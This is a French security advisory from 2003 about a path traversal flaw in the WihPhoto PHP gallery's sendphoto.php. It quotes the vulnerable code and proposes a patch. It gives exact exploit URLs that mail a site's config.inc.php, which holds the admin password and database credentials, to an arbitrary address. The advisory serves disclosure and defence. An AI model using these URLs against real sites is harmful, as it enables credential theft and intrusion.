WihPhoto ******** Informations : °°°°°°°°°°°°°° Langage : PHP Version : 0.86-dev Website : http://www.wihsy.com Problème : Récuperation de fichiers du disque dur Developpement : °°°°°°°°°°°°°°° WihPhoto est un script permettant de gérer une gallerie d'images. Ce script contient une partie admin, et des fonctions comme l'envois d'une image à un ami, la gestion de descriptions, l'ajout d'albums, la supression de photos,... Dans le fichier util/email.php, on peut voir le code suivant : ---------------------------------------------------------------------------------------------------------- subject = $subject; $this->addr_to = $to; $this->smtp_headers = $this->write_smtpheaders($from); $this->text_body = $this->write_body($msg); $this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename); $this->mime_headers = $this->write_mimeheaders($filename, $mime_filename); } function attach_file($filename,$mimetype,$mime_filename) { $encoded = $this->encode_file($filename); if ($mime_filename) $filename = $mime_filename; $out = "--" . $this->mime_boundary . "\n"; $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n"; $out = $out . "Content-Transfer-Encoding: base64\n"; $out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n"; $out = $out . $encoded . "\n"; $out = $out . "--" . $this->mime_boundary . "--" . "\n"; return $out; // added -- to notify email client attachment is done } function encode_file($sourcefile) { if (is_readable($sourcefile)) { $fd = fopen($sourcefile, "r"); $contents = fread($fd, filesize($sourcefile)); $encoded = my_chunk_split(base64_encode($contents)); fclose($fd); } return $encoded; } function sendfile() { $headers = $this->smtp_headers . $this->mime_headers; $message = $this->text_body . $this->text_encoded; mail($this->addr_to,$this->subject,$message,$headers); } [...] function write_mimeheaders($filename, $mime_filename) { if ($mime_filename) $filename = $mime_filename; $out = "MIME-version: 1.0\n"; $out = $out . "Content-type: multipart/mixed; "; $out = $out . "boundary=\"$this->mime_boundary\"\n"; $out = $out . "Content-transfer-encoding: 7BIT\n"; $out = $out . "X-attachments: $filename;\n\n"; return $out; } [...] } [...] ---------------------------------------------------------------------------------------------------------- Cette class est déstinée à envoyer un mail avec un fichier attaché. Elle est utilisée dans le fichier sendphoto.php, qui est le fichier qui doit permettre à un utilisateur d'envoyer une image de la gallerie par e-mail. On y voit le code suivant : ------------------------------------------------------------------------------------ include("util/email.php"); include("config.inc.php"); [...] if (!$filled) { print "
\n"; print "\n"; print "\n"; print "\n"; print "

$sendphoto_send_photo_to
"; print "

\n"; print "

\n"; print "

\n"; print "
\n"; print "\n"; } else { $message = "$sendphoto_message"; $album1 = rawurldecode($album); $filetoattach = "./$pix_base/$album1/$pic"; $mimetype = "image/jpeg"; $newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype); $newmail->sendfile(); print "$sendphoto_successful"; print "\n"; } ?> ------------------------------------------------------------------------------------ Le fichier qui sera envoyé est "./$pix_base/$album1/$pic". $pix_base est définie dans config.inc.php, lui-même inclut dans sendphoto.php : -------------------------- $pix_base = "albums"; -------------------------- Cette variable n'est donc pas utilisable. Par contre les variables $album1 et $pic peuvent être modifiée par n'importe qui. $pic est modifiable directement par l'url par exemple, et $album1 l'est par le biais de la variable $album, comme on voit dans la ligne : ------------------------------- $album1 = rawurldecode($album); ------------------------------- Donc, pour envoyer la photo http://[host]/albums/photos_holliday/sea.jpg à bob@server.com, il y a 2 possibilités, toutes les 2 via sendphoto.php. La première est via l'interface graphique; le formulaire dans le script sendphoto.php. L'url dans ce cas-ci pour y accèder serait : http://[host]/sendphoto.php?album=photos_holliday&pic=sea.jpg et il ne resterait plus qu'à entrer l'e-mail dans le champ prévu à cet effet. L'autre possibilité étant de ne pas utiliser le formulaire mais directement une URL, ici elle serait : http://[host]/sendphoto.php?album=photos_holliday&pic=sea.jpg&sendto=bob@server.com&filled=1 Le problème est qu'il n'y a aucune vérification du path ou du type du fichier. On peut donc envoyer à qui ont veux, par mail, n'importe quel fichier se trouvant dans le disque dur du site. Par exemple, pour envoyer à quelqu'un un mail avec les sources du fichier http://[target]/config.inc.php, contenant le mot de passe admin et les informations de la base de données SQL (host, pass, user, nom), on peut utiliser les urls : http://[target]/sendphoto.php?album=.&pic=../config.inc.php en passant par le formulaire ou http://[target]/sendphoto.php?album=.&pic=../config.inc.php&sendto=[E-MAIL]&filled=1 directement par l'url. Ou encore http://[target]/sendphoto.php?album=..&pic=config.inc.php en passant par le formulaire ou http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 directement par l'url. etc... Le fichier envoyé par email a comme nom son path légérement modifié (les / remplacés par _), c'est-à-dire un nom du style : ._albums_[ALBUM]_[FILE] Pour nos exemples ça donnera un fichier attaché nommé : ._albums_._.._config.inc.php (où [ALBUM]=. et [FILE]=.._config.inc.php) pour le premier exemple et ._albums_.._config.inc.php (où [ALBUM]=.. et [FILE]=config.inc.php) pour le second. Solution : °°°°°°°°°° Dans sendphoto.php, juste entre les lignes : ------- } else { ------- et --------------------------------- $message = "$sendphoto_message"; $album1 = rawurldecode($album); --------------------------------- Ajouter les lignes : ------------------------------------------------------------------------------------- if (ereg('/',$pic) OR ereg("\.\.",$pic) OR ereg("/",$album) OR ereg("\.\.",$album)) { die("Unauthorized album or picture name."); } ------------------------------------------------------------------------------------- Un patch peut être trouvé sur http://www.phpsecure.info. Credits : °°°°°°°°° Auteur : frog-m@n E-mail : frog-man@phpsecure.info Websites : http://www.frog-man.org, http://www.phpsecure.info Date : 23/02/03